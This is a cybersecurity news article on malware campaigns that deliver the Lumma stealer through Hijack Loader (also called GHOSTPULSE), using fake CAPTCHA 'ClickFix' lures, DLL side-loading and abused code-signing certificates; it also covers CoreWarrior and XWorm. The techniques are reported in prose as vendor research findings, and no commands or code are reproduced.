Loader Malware

Cybersecurity researchers have disclosed a new malware campaign that delivers Hijack Loader artifacts that are signed with legitimate code-signing certificates.

French cybersecurity company HarfangLab, which detected the activity at the start of the month, said the attack chains aim to deploy an information stealer known as Lumma.

Hijack Loader, also known as DOILoader, IDAT Loader, and SHADOWLADDER, first came to light in September 2023. Attack chains involving the malware loader typically involve tricking users into downloading a booby-trapped binary under the guise of pirated software or movies.

Recent variations of these campaigns have been found to direct users to fake CAPTCHA pages that urge site visitors to prove they are human by copying and running an encoded PowerShell command that drops the malicious payload in the form of a ZIP archive.

Cybersecurity

HarfangLab said it observed three different versions of the PowerShell script starting mid-September 2024 -

  • A PowerShell script that leverages mshta.exe to execute code hosted on a remote server
  • A remotely-hosted PowerShell script that's directly executed via the Invoke-Expression cmdlet (aka iex)
  • A PowerShell script that employs msiexec.exe to download and execute a payload from a remote URL

The ZIP archive, for its part, includes a genuine executable that's susceptible to DLL side-loading and the malicious DLL (i.e., Hijack Loader) that's to be loaded instead.

"The purpose of the sideloaded HijackLoader DLL is to decrypt and execute an encrypted file which is provided in the package," HarfangLab said. "This file conceals the final HijackLoader stage, which is aimed at downloading and executing a stealer implant."

The delivery mechanism is said to have changed from DLL side-loading to using several signed binaries in early October 2024 in an attempt to evade detection by security software.

It's currently not clear if all the code-signing certificates were stolen or intentionally generated by the threat actors themselves, although the cybersecurity firm assessed with low to medium confidence that it could be the latter. The certificates have since been revoked.

"For several issuing certificate authorities, we noticed that acquiring and activating a code-signing certificate is mostly automated, and only requires a valid company registration number as well as a contact person," it said. "This research underscores that malware can be signed, highlighting that code signature alone cannot serve as a baseline indicator of trustworthiness."

The development comes as SonicWall Capture Labs warned of a surge in cyber attacks infecting Windows machines with a malware dubbed CoreWarrior.

"This is a persistent trojan that attempts to spread rapidly by creating dozens of copies of itself and reaching out to multiple IP addresses, opening multiple sockets for backdoor access, and hooking Windows UI elements for monitoring," it said.

Cybersecurity

Phishing campaigns have also been observed delivering a commodity stealer and loader malware known as XWorm by means of a Windows Script File (WSF) that, in turn, downloads and executes a PowerShell script hosted on paste[.]ee.

Loader Malware

The PowerShell script subsequently launches a Visual Basic Script, which acts as a conduit to execute a series of batch and PowerShell scripts to load a malicious DLL that's responsible for injecting XWorm into a legitimate process ("RegSvcs.exe").

The latest version of XWorm (version 5.6) includes the ability to report response time, collect screenshots, read and modify the victim's host file, perform a denial-of-service (DoS) attack against a target, and remove stored plugins, indicating an attempt to avoid leaving a forensic trail.

"XWorm is a multifaceted tool that can provide a wide range of functions to the attacker," Netskope Threat Labs security researcher Jan Michael Alcantara said.

Update

Elastic Security Labs, which is tracking Hijack Loader under the name GHOSTPULSE, said it observed new samples that come fitted with significant changes to its inner workings.

"In its earlier iterations, GHOSTPULSE abused the IDAT chunk of PNG files to hide malicious payloads," security researcher Salim Bitam said in an analysis published on October 19, 2024.

"Instead of extracting the payload from the IDAT chunk, the latest version of GHOSTPULSE now parses the pixels of the image to retrieve its configuration and payload. This new approach involves embedding malicious data directly within the pixel structure."

The attack chain leverages an increasingly prevalent social engineering tactic dubbed ClickFix to entice users into manually copying and executing PowerShell script into a terminal, thus triggering the deployment of the malware loader.


Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.